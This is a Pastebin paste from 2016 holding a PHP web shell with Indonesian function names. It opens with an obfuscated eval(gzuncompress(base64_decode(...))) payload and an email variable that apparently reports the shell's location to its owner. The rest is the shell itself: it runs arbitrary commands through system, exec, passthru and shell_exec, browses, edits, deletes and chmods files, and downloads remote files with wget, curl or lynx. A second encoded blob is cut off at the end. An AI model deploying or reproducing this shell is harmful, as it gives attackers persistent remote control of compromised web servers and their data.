ardaloka

ardaloka

Mar 25th, 2016
441
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 159.32 KB | None | 0 0
  1. <?php
  2. $tujuanmail = 'ardaloka69@gmail.com';
  3. # ganti dengan email kamu
  4. eval(gzuncompress(base64_decode('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')));
  5. ?>
  6. <?
  7.  
  8. function rapih($text){ return trim(str_replace("<br />","",$text)); }
  9. function magicboom($text) {
  10. if (!get_magic_quotes_gpc())
  11. { return $text; }
  12. return stripslashes($text);
  13. }
  14. function showdir($pwd,$prompt){
  15. $fname = array();
  16. $dname = array();
  17. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE;
  18. $user = "????:????";
  19.  
  20. if($dh = opendir($pwd)){
  21. while($file = readdir($dh)){
  22. if(is_dir($file))
  23. { $dname[] = $file; }
  24. elseif(is_file($file))
  25. { $fname[] = $file; }
  26. }
  27. closedir($dh);
  28. }
  29. sort($fname);
  30. sort($dname);
  31. $path = @explode(DIRECTORY_SEPARATOR,$pwd);
  32. $tree = @sizeof($path);
  33. $parent = "";
  34.  
  35. $buff = "<form action=\"?rd=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
  36. <table class=\"cmdbox\" style=\"width:50%;\">
  37. <tr>
  38. <td><nobr><b>CMD :</b></nobr></td>
  39. <td><!-- onMouseOver=\"this.focus();\" --><nobr><input id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:250px;\" value=\"\" />
  40. <input class=\"inputzbut\" type=\"submit\" value=\" >> \" name=\"submitcmd\" style=\"width:50px;\" />
  41. </nobr>
  42. </form>
  43. </td>
  44. </tr>
  45. <tr>
  46. <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
  47. <input type=\"hidden\" name=\"rd\" value=\"".$pwd."\" />
  48. <td><nobr><b>DIR &nbsp;&nbsp;:</b></nobr></td>
  49. <td><nobr><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:250px;\" value=\"".$pwd."\" />
  50. <input class=\"inputzbut\" type=\"submit\" value=\" >> \" name=\"submitcmd\" style=\"width:50px;\" /></nobr>
  51. </td>
  52. </tr>
  53. </form>
  54. </table>
  55.  
  56. <p><table class=\"explore\"><tr>
  57. <th style=\"width:180px;\"><strong><span class='b3'>NAME</span></strong></th>
  58. <th style=\"width:60px;\"><strong><span class='b3'>DIR / SIZE</span></strong></th>
  59. <th style=\"width:60px;\"><strong><span class='b3'>CHMOD</span></strong></th>
  60. <th style=\"width:140px;\"><strong><span class='b3'>OWNER : GROUP</span></strong></th>
  61. <th style=\"width:140px;\"><strong><span class='b3'>LAST ACCESS</span></strong></th>
  62. <th style=\"width:150px;\"><strong><span class='b3'>ACTION</span></strong></th></tr>";
  63.  
  64. if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
  65. else $parent = $pwd;
  66. foreach($dname as $folder){
  67. if($folder == ".")
  68. {
  69. if(!$win && $posix){
  70. $name=@posix_getpwuid(@fileowner($folder));
  71. $group=@posix_getgrgid(@filegroup($folder));
  72. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  73. }
  74. else { $owner = $user; }
  75.  
  76. $buff .= "<tr>
  77. <td align=center><a href=\"?rd=".$pwd."\">$folder</a></td>
  78. <td align=center>-</td>
  79. <td align=center>".substr(sprintf('%o', fileperms($pwd)), -4)."</td>
  80. <td align=center>".$owner."</td>
  81. <td align=center>".date("d-M-Y H:i",@filemtime($pwd))."</td>
  82. <td align=center><span id=\"titik1\">
  83. <a href=\"?rd=$pwd&amp;edit=".$pwd."new.php\">+FILE&nbsp;</a><span class=\"infodmx\">||</span><a href=\"javascript:tukar('titik1','titik1_form');\">&nbsp;+FOLDER</a></span>
  84. <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  85. <input type=\"hidden\" name=\"rd\" value=\"".$pwd."\" />
  86. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"folder\" />
  87. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  88. </form>
  89. </td></tr>";
  90. }
  91.  
  92. elseif($folder == "..") {
  93. if(!$win && $posix){
  94. $name=@posix_getpwuid(@fileowner($folder));
  95. $group=@posix_getgrgid(@filegroup($folder));
  96. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  97. }
  98. else { $owner = $user; }
  99. $buff .= "<tr>
  100. <td><a href=\"?rd=".$parent."\"><img src='' /> $folder</a></td>
  101. <td align=center>-</td>
  102. <td align=center>".substr(sprintf('%o', fileperms($parent)), -4)."</td>
  103. <td align=center>".$owner."</td>
  104. <td align=center>".date("d-M-Y H:i",@filemtime($parent))."</td>
  105. <td align=center><span id=\"titik2\">
  106. <a href=\"?rd=$pwd&amp;edit=".$parent."new.php\">+FILE&nbsp;</a><span class=\"infodmx\">||</span><a href=\"javascript:tukar('titik2','titik2_form');\">&nbsp;+FOLDER</a></span>
  107. <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  108. <input type=\"hidden\" name=\"rd\" value=\"".$pwd."\" />
  109. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"folder\" />
  110. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  111. </form>
  112. </td>
  113. </tr>";
  114. } else {
  115. if(!$win && $posix){
  116. $name=@posix_getpwuid(@fileowner($folder));
  117. $group=@posix_getgrgid(@filegroup($folder));
  118. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  119. }
  120. else { $owner = $user; }
  121. $buff .= "<tr>
  122. <td>
  123. <a id=\"".clearspace($folder)."_link\" href=\"?rd=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><img src='' /> $folder </a>
  124.  
  125. <form action=\"?rd=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  126. <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  127. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
  128. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  129. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
  130. </form>
  131. </td>
  132.  
  133. <td align=center>FOLDER</td>
  134.  
  135. <td align=center><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">
  136. ".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."</a>
  137. <form action=\"?rd=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  138. <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  139. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
  140. <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
  141. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></td>
  142. <td align=center>".$owner."</td>
  143. <td align=center>".date("d-M-Y H:i",@filemtime($folder))."</td>
  144. <td align=center><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">[REN]&nbsp;</a><span class=\"infodmx\">||</span><a href=\"?rd=$pwd&amp;fdelete=".$pwd.$folder."\">&nbsp;[DEL]</a>
  145. </td></tr>";
  146. } }
  147.  
  148. foreach($fname as $file){
  149. $full = $pwd.$file;
  150. if(!$win && $posix){
  151. $name=@posix_getpwuid(@fileowner($file));
  152. $group=@posix_getgrgid(@filegroup($file));
  153. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  154. }
  155. else { $owner = $user; }
  156. $buff .= "<tr>
  157. <td><a id=\"".clearspace($file)."_link\" href=\"?rd=$pwd&amp;view=$full\"><img src='%3D' /> $file</a><form action=\"?rd=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  158. <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  159. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
  160. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  161. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
  162. </form></td>
  163.  
  164. <td align=center>".ukuran($full)."</td>
  165. <td align=center><a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".substr(sprintf('%o', fileperms($full)), -4)."</a><form action=\"?rd=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  166. <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  167. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
  168. <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
  169. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" />
  170. </form></center></td>
  171. <td align=center>".$owner."</td>
  172. <td align=center>".date("d-M-Y H:i",@filemtime($full))."</td>
  173. <td align=center><a href=\"?rd=$pwd&amp;edit=$full\">[E]</a>
  174. <span class=\"infodmx\">||</span>
  175. <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">[R]</a>
  176. <span class=\"infodmx\">||</span>
  177. <a href=\"?rd=$pwd&amp;delete=$full\">[X]</a>
  178. <span class=\"infodmx\">||</span>
  179. <a href=\"?rd=$pwd&amp;dl=$full\">[D]</a>
  180. <span class=\"infodmx\">||</span>
  181. <a href=\"?rd=$pwd&amp;dlgzip=$full\">[gzip]</a>
  182. </td></tr>";
  183. }
  184. $buff .= "</table></p>";
  185. return $buff;
  186. }
  187.  
  188. function ukuran($file){
  189. if($size = @filesize($file)){
  190. if($size <= 1024) {
  191. return "$size Bytes";
  192. } else {
  193. if($size <= 1024*1024) {
  194. $size = @round($size / 1024,2);;
  195. return "$size KB";
  196. } else {
  197. $size = @round($size / 1024 / 1024,2);
  198. return "$size MB";
  199. }
  200. }
  201. }
  202. else return "???";
  203. }
  204. function exe($cmd){
  205. if(function_exists('system')) {
  206. @ob_start();
  207. @system($cmd);
  208. $buff = @ob_get_contents();
  209. @ob_end_clean();
  210. return $buff;
  211. }
  212. elseif(function_exists('exec')) {
  213. @exec($cmd,$results);
  214. $buff = "";
  215. foreach($results as $result){
  216. $buff .= $result;
  217. }
  218. return $buff;
  219. }
  220. elseif(function_exists('passthru')) {
  221. @ob_start();
  222. @passthru($cmd);
  223. $buff = @ob_get_contents();
  224. @ob_end_clean();
  225. return $buff;
  226. }
  227. elseif(function_exists('shell_exec')){
  228. $buff = @shell_exec($cmd);
  229. return $buff;
  230. }
  231. }
  232.  
  233. function tulis($file,$text){
  234. $textz = gzinflate(base64_decode($text));
  235. if($filez = @fopen($file,"w")) {
  236. @fputs($filez,$textz);
  237. @fclose($file);
  238. }
  239. }
  240.  
  241. function ambil($link,$file) {
  242. if($fp = @fopen($link,"r")){
  243. while(!feof($fp)) {
  244. $cont.= @fread($fp,1024);
  245. }
  246. @fclose($fp);
  247. $fp2 = @fopen($file,"w");
  248. @fwrite($fp2,$cont);
  249. @fclose($fp2);
  250. }
  251. }
  252. function which($pr){
  253. $path = exe("which $pr");
  254. if(!empty($path)) {
  255. return trim($path);
  256. } else {
  257. return trim($pr);
  258. }
  259. }
  260. function download($cmd,$url){
  261. $namafile = basename($url);
  262. switch($cmd) {
  263. case 'wwget':
  264. exe(which('wget')." ".$url." -O ".$namafile);
  265. break;
  266. case 'wlynx':
  267. exe(which('lynx')." -source ".$url." >".$namafile);
  268. break;
  269. case 'wfread' :
  270. ambil($wurl,$namafile);
  271. break;
  272. case 'wfetch' :
  273. exe(which('fetch')." -o ".$namafile." -p ".$url);
  274. break;
  275. case 'wlinks' :
  276. exe(which('links')." -source ".$url." >".$namafile);
  277. break;
  278. case 'wget' :
  279. exe(which('GET')." ".$url." >".$namafile);
  280. break;
  281. case 'wcurl' :
  282. exe(which('curl')." ".$url." -o ".$namafile);
  283. break;
  284. default:
  285. break;
  286. }
  287. return $namafile;
  288. }
  289.  
  290.  
  291. function get_perms($file) {
  292. if($mode=@fileperms($file)){
  293. $perms='';
  294. $perms .= ($mode & 00400) ? 'r' : '-';
  295. $perms .= ($mode & 00200) ? 'w' : '-';
  296. $perms .= ($mode & 00100) ? 'x' : '-';
  297. $perms .= ($mode & 00040) ? 'r' : '-';
  298. $perms .= ($mode & 00020) ? 'w' : '-';
  299. $perms .= ($mode & 00010) ? 'x' : '-';
  300. $perms .= ($mode & 00004) ? 'r' : '-';
  301. $perms .= ($mode & 00002) ? 'w' : '-';
  302. $perms .= ($mode & 00001) ? 'x' : '-';
  303. return $perms;
  304. }
  305. else return "??????????";
  306. }
  307. function clearspace($text){
  308. return str_replace(" ","_",$text);
  309. }
  310. ?>
  311. <?php
  312. $rahasia = '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